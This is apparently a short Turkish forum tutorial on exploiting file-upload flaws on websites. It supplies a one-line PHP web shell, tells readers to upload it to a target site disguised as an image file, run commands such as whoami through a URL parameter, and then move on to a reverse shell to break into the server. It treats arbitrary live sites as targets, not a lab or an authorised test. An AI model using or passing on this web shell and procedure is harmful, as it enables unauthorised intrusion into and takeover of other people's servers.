Yazıda bahsedilen payload dosyalarını hazır halleri bunları sunucuya yükle ve bağlantıyı bekle
şimdi bu uzaktan kod yürütmemizi sağlayan açık herhangi bir sitenin mesela dosya paylaşımı için dosya yükleme yerinde veya chat kısmında dosya yükleme yerinde hatta daha ileri seviyede direk kişiye fotoğraf atarak bile ola bilri biz şimdi burda sitede dosya yükleme yerlerinde eğer bir zafiyet varsa bunu nasıl sömürürüz ona bakacaz
öncelikle bi bakalım öyle bir açık sitede var mı diyebir php dosyası oluşturlaım ve içine şu kodu yazalım
Kod:
<?php system($_GET['cmd']); ?><br>
sonra dosyayı kaydedip sunucuya atalım ve url ye şunu girin ama şunu unutmayın herzaman /upload dizininde olacak diye bir şey yok resmin bağlantısına bakın ve ona göre sonuna ?cmd=whoami şunu koyun (siteye yükledikten sonra)
Kod:
https://site.com/uploads/resim.php.jpg?cmd=whoami
eğerki sitede öyle bir açık varsa size bir kullanıcı dödürür bir yazı root veya kali yada başka bir kullanıcı bunu döndürdüyse geçmiş olsun sitenin içinden bile geçeriz
eğerki bu kodu yazınca çalışıyorsa daha yüksek kodlar yazmamız gerekir reverse shell için direk sunucya sızmak için






